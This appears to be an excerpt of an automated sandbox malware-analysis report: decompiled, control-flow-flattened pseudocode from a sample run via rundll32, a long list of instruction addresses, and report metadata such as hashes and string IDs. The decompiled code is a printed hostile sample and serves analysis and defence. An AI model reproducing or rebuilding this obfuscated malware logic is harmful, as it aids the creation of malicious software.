						__eflags = _t1034 - 0x27e8449b;
						if(__eflags > 0) {
							__eflags = _t1034 - 0x3423e013;
							if(__eflags > 0) {
								__eflags = _t1034 - 0x3615a788;
								if(_t1034 == 0x3615a788) {
									__eflags = E02009DBF();
									if(__eflags != 0) {
										L100:
										_t1034 = 0x36183806;
										while(1) {
											L1:
											_t927 = 0xd2c2d4a;
											goto L2;
										}
									}
									_t1034 = 0xfb8ec94;
									goto L104;
								}
								__eflags = _t1034 - 0x36183806;
								if(_t1034 == 0x36183806) {
									_t927 = E0200D02D();
									goto L110;
								}
								__eflags = _t1034 - 0x3939669c;
								if(__eflags == 0) {
									_t1034 = 0x1e95092c;
									_v108 = _v324;
									while(1) {
										L1:
										_t927 = 0xd2c2d4a;
										goto L2;
									}
								}
								__eflags = _t1034 - 0x3954b45a;
								if(_t1034 != 0x3954b45a) {
									goto L105;
								}
								E01FF434A();
								goto L100;
							}
							if(__eflags == 0) {
								_t1115 = _v332;
								__eflags = E02002FA1(_v228, _v332, __eflags,  &_v140);
								if(__eflags != 0) {
									_t1118 = _v464;
									_t1138 = 0x1e95092c;
								}
								goto L94;
							}
							__eflags = _t1034 - 0x2bcd9dcd;
							if(_t1034 == 0x2bcd9dcd) {
								E01FF4844();
								_t1034 = 0x1f5179fa;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x2ec155bf;
							if(_t1034 == 0x2ec155bf) {
								E01FFE044();
								asm("sbb ecx, ecx");
								_t1034 = (_t1034 & 0x0f0237cc) + 0x1ccb6601;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x2f84b03e;
							if(_t1034 == 0x2f84b03e) {
								_t1115 = _v260;
								E02000EC3(_v340, _v260, _v348,  &_v96);
								_t1034 = 0x2084686f;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x301909e3;
							if(_t1034 != 0x301909e3) {
								goto L105;
							}
							_push(_v284);
							_t1115 =  &_v156;
							_push(_v520);
							_push(_v512);
							_t947 = E01FF7FFE( &_v148,  &_v156);
							_t1145 = _t1145 + 0xc;
							__eflags = _t947;
							if(__eflags == 0) {
								E02005237();
								_t1138 = 0x1e95092c;
								_t1118 = E01FFDF8A( &_v148,  &_v156, __eflags, _v356, _v268);
								L71:
								_t1034 = 0x8331fa3;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							_t1138 = 0x1e95092c;
							_t1118 = E01FFDF8A( &_v148,  &_v156, __eflags, _v496, _v372);
							_t1034 = 0x8e3e7b7;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_t927 = E0200512B(_t1034);
							goto L110;
						}
						__eflags = _t1034 - 0x21dc4a65;
						if(__eflags > 0) {
							__eflags = _t1034 - 0x23cd63af;
							if(_t1034 == 0x23cd63af) {
								_t1115 = _v96;
								E01FFDE81(_v292, _v96, _v300);
								_t1034 = 0xda73f77;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x24a19024;
							if(__eflags == 0) {
								_t1034 = 0x16840c8b;
								goto L2;
							}
							__eflags = _t1034 - 0x25120b57;
							if(__eflags == 0) {
								_v88 = E01FFDE79();
								_t1034 = 0x5a723c8;
								while(1) {
									L1:
									_t927 = 0xd2c2d4a;
									goto L2;
								}
							}
							__eflags = _t1034 - 0x25886259;
							if(_t1034 != 0x25886259) {
								goto L105;
							}
							E0200434E();
							_t1034 = 0x11e6b71b;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_t1115 = _v148;
							E01FFDE81(_v544, _v148, _v172);
							goto L71;
						}
						__eflags = _t1034 - 0x1e95092c;
						if(_t1034 == 0x1e95092c) {
							_t1115 =  &_v104;
							E0200C6D9( &_v104, _v168);
							_t1034 = 0x2f84b03e;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x1f5179fa;
						if(_t1034 == 0x1f5179fa) {
							_t927 = E01FFD2DD();
							__eflags = _t927;
							if(__eflags == 0) {
								goto L110;
							}
							_t1034 = 0x90774b6;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x1f9ed57a;
						if(__eflags == 0) {
							_t1034 = 0x3939669c;
							_v112 = _v388;
							while(1) {
								L1:
								_t927 = 0xd2c2d4a;
								goto L2;
							}
						}
						__eflags = _t1034 - 0x2084686f;
						if(_t1034 != 0x2084686f) {
							goto L105;
						}
						_t1115 = _v404;
						E01FF9106(_v404, _v240, _v412,  &_v128,  &_v156);
						_t1145 = _t1145 + 0x10;
						asm("sbb ecx, ecx");
						_t1034 = (_v396 & 0x0c4ba634) + 0x23cd63af;
						goto L1;
						L105:
						__eflags = _t1034 - 0x25829b99;
					} while (__eflags != 0);
					goto L110;
				}
			}



















































































































































                                                                      0x02005256
                                                                      0x02005260
                                                                      0x0200526a
                                                                      0x02005275
                                                                      0x0200527a
                                                                      0x02005285
                                                                      0x02005290
                                                                      0x02005298
                                                                      0x020052a0
                                                                      0x020052a8
                                                                      0x020052b0
                                                                      0x020052b8
                                                                      0x020052c3
                                                                      0x020052ce
                                                                      0x020052d9
                                                                      0x020052e4
                                                                      0x020052ec
                                                                      0x020052f7
                                                                      0x02005302
                                                                      0x0200530d
                                                                      0x02005318
                                                                      0x02005323
                                                                      0x0200532e
                                                                      0x02005339
                                                                      0x02005344
                                                                      0x02005358
                                                                      0x0200535d
                                                                      0x02005366
                                                                      0x02005371
                                                                      0x0200537c
                                                                      0x02005384
                                                                      0x0200538f
                                                                      0x0200539a
                                                                      0x020053a2
                                                                      0x020053ad
                                                                      0x020053b5
                                                                      0x020053be
                                                                      0x020053c1
                                                                      0x020053c5
                                                                      0x020053cd
                                                                      0x020053d5
                                                                      0x020053e0
                                                                      0x020053eb
                                                                      0x020053f6
                                                                      0x02005401
                                                                      0x0200540c
                                                                      0x02005417
                                                                      0x02005422
                                                                      0x02005435
                                                                      0x0200543c
                                                                      0x02005447
                                                                      0x0200544f
                                                                      0x02005454
                                                                      0x0200545c
                                                                      0x02005461
                                                                      0x02005469
                                                                      0x02005471
                                                                      0x0200547e
                                                                      0x02005482
                                                                      0x0200548a
                                                                      0x02005492
                                                                      0x0200549d
                                                                      0x020054a5
                                                                      0x020054b0
                                                                      0x020054bb
                                                                      0x020054c6
                                                                      0x020054d1
                                                                      0x020054e1
                                                                      0x020054e6
                                                                      0x020054ec
                                                                      0x020054f4
                                                                      0x020054fc
                                                                      0x02005504
                                                                      0x0200550f
                                                                      0x0200551a
                                                                      0x02005525
                                                                      0x0200552d
                                                                      0x02005535
                                                                      0x02005542
                                                                      0x02005545
                                                                      0x02005549
                                                                      0x02005551
                                                                      0x02005564
                                                                      0x0200556b
                                                                      0x02005576
                                                                      0x02005581
                                                                      0x02005591
                                                                      0x02005595
                                                                      0x020055a1
                                                                      0x020055a6
                                                                      0x020055ac
                                                                      0x020055b4
                                                                      0x020055bf
                                                                      0x020055ca
                                                                      0x020055d5
                                                                      0x020055e0
                                                                      0x020055ec
                                                                      0x020055ef
                                                                      0x020055f8
                                                                      0x020055fc
                                                                      0x02005604
                                                                      0x0200560c
                                                                      0x02005617
                                                                      0x02005622
                                                                      0x0200562d
                                                                      0x02005638
                                                                      0x02005640
                                                                      0x0200564b
                                                                      0x02005656
                                                                      0x02005669
                                                                      0x02005670
                                                                      0x0200567b
                                                                      0x02005686
                                                                      0x02005691
                                                                      0x0200569c
                                                                      0x020056a7
                                                                      0x020056b2
                                                                      0x020056bd
                                                                      0x020056c8
                                                                      0x020056d3
                                                                      0x020056de
                                                                      0x020056e9
                                                                      0x020056f4
                                                                      0x020056fc
                                                                      0x02005704
                                                                      0x02005709
                                                                      0x02005711
                                                                      0x02005719
                                                                      0x02005721
                                                                      0x02005732
                                                                      0x02005735
                                                                      0x02005741
                                                                      0x02005745
                                                                      0x0200574d
                                                                      0x02005758
                                                                      0x02005763
                                                                      0x0200576e
                                                                      0x02005779
                                                                      0x02005784
                                                                      0x0200578f
                                                                      0x0200579a
                                                                      0x020057a5
                                                                      0x020057b0
                                                                      0x020057bb
                                                                      0x020057c6
                                                                      0x020057d9
                                                                      0x020057dc
                                                                      0x020057e3
                                                                      0x020057ee
                                                                      0x020057f9
                                                                      0x02005801
                                                                      0x0200580c
                                                                      0x02005817
                                                                      0x02005822
                                                                      0x0200582d
                                                                      0x02005838
                                                                      0x02005840
                                                                      0x0200584b
                                                                      0x02005856
                                                                      0x0200586c
                                                                      0x02005873
                                                                      0x0200587e
                                                                      0x02005889
                                                                      0x02005899
                                                                      0x020058a0
                                                                      0x020058ab
                                                                      0x020058b6
                                                                      0x020058cc
                                                                      0x020058d3
                                                                      0x020058de
                                                                      0x020058e9
                                                                      0x020058f4
                                                                      0x020058ff
                                                                      0x0200590a
                                                                      0x02005912
                                                                      0x0200591d
                                                                      0x02005928
                                                                      0x02005933
                                                                      0x0200593e
                                                                      0x02005949
                                                                      0x02005954
                                                                      0x0200595f
                                                                      0x02005967
                                                                      0x02005972
                                                                      0x0200597d
                                                                      0x02005988
                                                                      0x02005993
                                                                      0x020059a5
                                                                      0x020059a8
                                                                      0x020059af
                                                                      0x020059ba
                                                                      0x020059c2
                                                                      0x020059ca
                                                                      0x020059d7
                                                                      0x020059dc
                                                                      0x020059e2
                                                                      0x020059ea
                                                                      0x020059f5
                                                                      0x020059fd
                                                                      0x02005a08
                                                                      0x02005a10
                                                                      0x02005a15
                                                                      0x02005a22
                                                                      0x02005a23
                                                                      0x02005a27
                                                                      0x02005a2f
                                                                      0x02005a3c
                                                                      0x02005a40
                                                                      0x02005a48
                                                                      0x02005a50
                                                                      0x02005a58
                                                                      0x02005a63
                                                                      0x02005a6e
                                                                      0x02005a79
                                                                      0x02005a84
                                                                      0x02005a8f
                                                                      0x02005a9a
                                                                      0x02005aa5
                                                                      0x02005ab0
                                                                      0x02005ab8
                                                                      0x02005ac3
                                                                      0x02005ace
                                                                      0x02005ad9
                                                                      0x02005ae4
                                                                      0x02005aef
                                                                      0x02005afa
                                                                      0x02005b05
                                                                      0x02005b10
                                                                      0x02005b1b
                                                                      0x02005b26
                                                                      0x02005b31
                                                                      0x02005b3c
                                                                      0x02005b47
                                                                      0x02005b52
                                                                      0x02005b5d
                                                                      0x02005b68
                                                                      0x02005b73
                                                                      0x02005b7e
                                                                      0x02005b89
                                                                      0x02005b94
                                                                      0x02005b9f
                                                                      0x02005baa
                                                                      0x02005bb5
                                                                      0x02005bbd
                                                                      0x02005bcb
                                                                      0x02005bd4
                                                                      0x02005bd8
                                                                      0x02005be0
                                                                      0x02005beb
                                                                      0x02005bf3
                                                                      0x02005bfa
                                                                      0x02005c05
                                                                      0x02005c10
                                                                      0x02005c1b
                                                                      0x02005c26
                                                                      0x02005c33
                                                                      0x02005c3c
                                                                      0x02005c40
                                                                      0x02005c45
                                                                      0x02005c4d
                                                                      0x02005c55
                                                                      0x02005c62
                                                                      0x02005c67
                                                                      0x02005c6d
                                                                      0x02005c75
                                                                      0x02005c7d
                                                                      0x02005c88
                                                                      0x02005c90
                                                                      0x02005c98
                                                                      0x02005ca3
                                                                      0x02005caf
                                                                      0x02005cb4
                                                                      0x02005cb8
                                                                      0x02005cbd
                                                                      0x02005cc5
                                                                      0x02005ccd
                                                                      0x02005cd8
                                                                      0x02005ce3
                                                                      0x02005cee
                                                                      0x02005cf9
                                                                      0x02005d04
                                                                      0x02005d0f
                                                                      0x02005d1a
                                                                      0x02005d25
                                                                      0x02005d2d
                                                                      0x02005d35
                                                                      0x02005d40
                                                                      0x02005d4b
                                                                      0x02005d5b
                                                                      0x02005d5c
                                                                      0x02005d63
                                                                      0x02005d6e
                                                                      0x02005d79
                                                                      0x02005d84
                                                                      0x02005d8f
                                                                      0x02005d9a
                                                                      0x02005da5
                                                                      0x02005db0
                                                                      0x02005dbb
                                                                      0x02005dc3
                                                                      0x02005dcb
                                                                      0x02005dd0
                                                                      0x02005dd5
                                                                      0x02005ddd
                                                                      0x02005de8
                                                                      0x02005df3
                                                                      0x02005dfe
                                                                      0x02005e06
                                                                      0x02005e0e
                                                                      0x02005e16
                                                                      0x02005e1e
                                                                      0x02005e26
                                                                      0x02005e2e
                                                                      0x02005e38
                                                                      0x02005e41
                                                                      0x02005e45
                                                                      0x02005e4d
                                                                      0x02005e58
                                                                      0x02005e63
                                                                      0x02005e6e
                                                                      0x02005e79
                                                                      0x02005e84
                                                                      0x02005e8f
                                                                      0x02005e9a
                                                                      0x02005ea5
                                                                      0x02005eb0
                                                                      0x02005ebd
                                                                      0x02005ecd
                                                                      0x02005ed3
                                                                      0x02005edb
                                                                      0x02005ee3
                                                                      0x02005eeb
                                                                      0x02005efe
                                                                      0x02005f01
                                                                      0x02005f08
                                                                      0x02005f13
                                                                      0x02005f1e
                                                                      0x02005f29
                                                                      0x02005f32
                                                                      0x02005f33
                                                                      0x02005f41
                                                                      0x02005f48
                                                                      0x02005f53
                                                                      0x02005f5b
                                                                      0x02005f63
                                                                      0x02005f6b
                                                                      0x02005f73
                                                                      0x02005f7b
                                                                      0x02005f83
                                                                      0x02005f8b
                                                                      0x02005f93
                                                                      0x02005f9b
                                                                      0x02005fa3
                                                                      0x02005fab
                                                                      0x02005fb0
                                                                      0x02005fbd
                                                                      0x02005fbe
                                                                      0x02005fc2
                                                                      0x02005fca
                                                                      0x02005fd5
                                                                      0x02005fe8
                                                                      0x02005fef
                                                                      0x02005ffa
                                                                      0x02006002
                                                                      0x0200600a
                                                                      0x02006012
                                                                      0x0200601a
                                                                      0x02006022
                                                                      0x0200602d
                                                                      0x02006038
                                                                      0x02006040
                                                                      0x0200604b
                                                                      0x02006056
                                                                      0x02006061
                                                                      0x02006069
                                                                      0x02006074
                                                                      0x0200607c
                                                                      0x02006084
                                                                      0x0200608c
                                                                      0x02006094
                                                                      0x0200609c
                                                                      0x020060a7
                                                                      0x020060b2
                                                                      0x020060bd
                                                                      0x020060c8
                                                                      0x020060d0
                                                                      0x020060db
                                                                      0x020060e6
                                                                      0x020060f1
                                                                      0x020060fc
                                                                      0x02006107
                                                                      0x02006114
                                                                      0x02006118
                                                                      0x0200612a
                                                                      0x02006130
                                                                      0x0200613d
                                                                      0x02006155
                                                                      0x02006156
                                                                      0x0200615d
                                                                      0x02006164
                                                                      0x0200616f
                                                                      0x0200617a
                                                                      0x0200618b
                                                                      0x02006192
                                                                      0x02006199
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061a9
                                                                      0x020061af
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020061b5
                                                                      0x020065a9
                                                                      0x020065ab
                                                                      0x020065d5
                                                                      0x020065dc
                                                                      0x020065e4
                                                                      0x020065ad
                                                                      0x020065b4
                                                                      0x020065bb
                                                                      0x020065c3
                                                                      0x020065c3
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061bb
                                                                      0x020061bd
                                                                      0x020063a1
                                                                      0x020063a7
                                                                      0x02006471
                                                                      0x02006477
                                                                      0x02006596
                                                                      0x00000000
                                                                      0x02006596
                                                                      0x0200647d
                                                                      0x02006483
                                                                      0x02006517
                                                                      0x02006537
                                                                      0x02006563
                                                                      0x02006576
                                                                      0x02006584
                                                                      0x02006589
                                                                      0x0200658c
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006489
                                                                      0x0200648f
                                                                      0x020064d3
                                                                      0x020064d5
                                                                      0x0200621e
                                                                      0x0200621e
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020064e2
                                                                      0x020064f2
                                                                      0x020064ff
                                                                      0x02006506
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006491
                                                                      0x02006497
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020064a6
                                                                      0x020064ad
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063ad
                                                                      0x02006462
                                                                      0x02006467
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063b3
                                                                      0x020063b9
                                                                      0x02006446
                                                                      0x02006454
                                                                      0x02006404
                                                                      0x02006405
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063bf
                                                                      0x020063c5
                                                                      0x02006433
                                                                      0x02006438
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063c7
                                                                      0x020063cd
                                                                      0x02006416
                                                                      0x0200641b
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020063cf
                                                                      0x020063d5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020063e2
                                                                      0x02006402
                                                                      0x00000000
                                                                      0x02006402
                                                                      0x020061c3
                                                                      0x02006978
                                                                      0x020069a4
                                                                      0x020069ab
                                                                      0x020069ab
                                                                      0x020061c9
                                                                      0x020061cf
                                                                      0x020062a3
                                                                      0x020062a9
                                                                      0x02006365
                                                                      0x02006367
                                                                      0x020068e8
                                                                      0x020068e8
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006374
                                                                      0x02006379
                                                                      0x02006381
                                                                      0x02006386
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x0200638c
                                                                      0x02006394
                                                                      0x02006399
                                                                      0x00000000
                                                                      0x02006399
                                                                      0x020062af
                                                                      0x020062b5
                                                                      0x0200631b
                                                                      0x02006327
                                                                      0x0200632e
                                                                      0x02006336
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020062b7
                                                                      0x020062bd
                                                                      0x020062f4
                                                                      0x020062f9
                                                                      0x020062fb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02006308
                                                                      0x0200630d
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020062bf
                                                                      0x020062c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020062cf
                                                                      0x020062d4
                                                                      0x020062d6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020062dc
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061d5
                                                                      0x02006293
                                                                      0x02006299
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061e1
                                                                      0x02006275
                                                                      0x0200627a
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061ed
                                                                      0x02006260
                                                                      0x00000000
                                                                      0x02006260
                                                                      0x020061f5
                                                                      0x02006251
                                                                      0x02006256
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061fd
                                                                      0x02006232
                                                                      0x02006239
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061ff
                                                                      0x02006205
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200621c
                                                                      0x02006222
                                                                      0x0200695a
                                                                      0x0200695a
                                                                      0x00000000
                                                                      0x0200695a
                                                                      0x00000000
                                                                      0x0200621c
                                                                      0x020065ef
                                                                      0x020065f1
                                                                      0x0200678b
                                                                      0x02006791
                                                                      0x020068f2
                                                                      0x020068f8
                                                                      0x02006951
                                                                      0x02006953
                                                                      0x02006922
                                                                      0x02006922
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006955
                                                                      0x00000000
                                                                      0x02006955
                                                                      0x020068fa
                                                                      0x02006900
                                                                      0x0200699f
                                                                      0x00000000
                                                                      0x0200699f
                                                                      0x02006906
                                                                      0x0200690c
                                                                      0x02006933
                                                                      0x02006935
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x0200690e
                                                                      0x02006914
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200691d
                                                                      0x00000000
                                                                      0x0200691d
                                                                      0x02006797
                                                                      0x020068c2
                                                                      0x020068de
                                                                      0x020068e0
                                                                      0x020068e2
                                                                      0x020068e6
                                                                      0x020068e6
                                                                      0x00000000
                                                                      0x020068e0
                                                                      0x0200679d
                                                                      0x020067a3
                                                                      0x020068b3
                                                                      0x020068b8
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020067a9
                                                                      0x020067af
                                                                      0x0200688e
                                                                      0x02006895
                                                                      0x0200689d
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020067b5
                                                                      0x020067bb
                                                                      0x02006861
                                                                      0x0200686f
                                                                      0x02006876
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020067c1
                                                                      0x020067c7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020067cd
                                                                      0x020067d4
                                                                      0x020067db
                                                                      0x020067e6
                                                                      0x020067ea
                                                                      0x020067ef
                                                                      0x020067f2
                                                                      0x020067f4
                                                                      0x02006825
                                                                      0x0200682e
                                                                      0x0200684b
                                                                      0x020066f2
                                                                      0x020066f3
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020067fa
                                                                      0x02006815
                                                                      0x02006817
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020065f7
                                                                      0x0200698a
                                                                      0x00000000
                                                                      0x0200698a
                                                                      0x020065fd
                                                                      0x02006603
                                                                      0x020066fd
                                                                      0x02006703
                                                                      0x0200676d
                                                                      0x0200677b
                                                                      0x02006781
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006705
                                                                      0x0200670b
                                                                      0x0200675c
                                                                      0x00000000
                                                                      0x0200675c
                                                                      0x0200670d
                                                                      0x02006713
                                                                      0x0200674b
                                                                      0x02006752
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006715
                                                                      0x0200671b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200672c
                                                                      0x02006731
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006609
                                                                      0x020066e2
                                                                      0x020066ed
                                                                      0x00000000
                                                                      0x020066ed
                                                                      0x0200660f
                                                                      0x02006611
                                                                      0x020066c4
                                                                      0x020066cb
                                                                      0x020066d1
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006617
                                                                      0x0200661d
                                                                      0x0200669f
                                                                      0x020066a4
                                                                      0x020066a6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020066ac
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x0200661f
                                                                      0x02006625
                                                                      0x02006683
                                                                      0x02006688
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x00000000
                                                                      0x020061a4
                                                                      0x020061a4
                                                                      0x02006627
                                                                      0x0200662d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02006651
                                                                      0x0200665f
                                                                      0x02006664
                                                                      0x02006669
                                                                      0x02006671
                                                                      0x00000000
                                                                      0x0200695f
                                                                      0x0200695f
                                                                      0x0200695f
                                                                      0x00000000
                                                                      0x0200696b

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$$ 9$!n$"v$%'$%c$-o$/$1f$3n$4$6g$7$>lO$@e7$G?B$GS$J-,$J-,$J-,$LS$N6$R$T`$T$VV$dP$jV$j^$kg$nl$v1$3$7$>$B$|
                                                                      • API String ID: 0-3933709873
                                                                      • Opcode ID: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
                                                                      • Instruction ID: a2308d86a80c21bfd0c691438ea2f9005020984120f3e9f1bbb002ff6ba5d554
                                                                      • Opcode Fuzzy Hash: 66f4f4cbdfef4eaf4ae9ffe7777e528aa4aaf4be1a39a45842c7e379e678c8ce
                                                                      • Instruction Fuzzy Hash: 50B214715093818BE3B8CF65C49979FBBE6BFC4314F10891DE18A862A0DBB58949DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7FFE, Relevance: 30.7, Strings: 24, Instructions: 706COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 74%
                                                                      			E01FF7FFE(signed int __ecx, signed int __edx) {
				void* __edi;
				void* _t669;
				intOrPtr _t720;
				void* _t726;
				void* _t741;
				void* _t742;
				void* _t745;
				short _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				intOrPtr _t791;
				void* _t795;
				signed int _t801;
				signed int _t807;
				signed int _t809;
				signed int _t811;
				signed int _t826;
				signed int _t828;
				signed char* _t881;
				void* _t882;
				signed int _t889;
				short* _t890;
				short* _t891;
				signed int _t892;
				signed int _t897;
				signed int _t899;
				void* _t901;
				void* _t902;
				void* _t903;
				void* _t904;
				void* _t905;
				void* _t906;
				void* _t908;
				void* _t909;

				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				_t889 = __edx;
				_t892 = __ecx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x148)) = __edx;
				_push( *((intOrPtr*)(_t902 + 0xc6c)));
				 *((intOrPtr*)(_t902 + 0x12c)) = __ecx;
				_push(__edx);
				_push(__ecx);
				E02002550(_t669);
				 *((intOrPtr*)(_t902 + 0xe0)) = 0x50c;
				_t903 = _t902 + 0x14;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x43c2c0f0;
				_t899 = 0;
				_t795 = 0x2392656c;
				 *(_t903 + 0x128) = 0;
				_t776 = 3;
				 *(_t903 + 0xd0) =  *(_t903 + 0xcc) / _t776;
				 *(_t903 + 0xd0) =  *(_t903 + 0xd0) ^ 0x16964c14;
				 *(_t903 + 0xcc) = 0x7d6c;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) + 0xffff22e1;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) >> 3;
				 *(_t903 + 0xcc) =  *(_t903 + 0xcc) ^ 0x1fffd9b4;
				 *(_t903 + 0x74) = 0xc1a1;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) << 7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) | 0x752db8c7;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x756d9f65;
				 *(_t903 + 0x54) = 0x6653;
				 *(_t903 + 0x54) =  *(_t903 + 0x54) | 0xef6ea2da;
				_t777 = 0x4f;
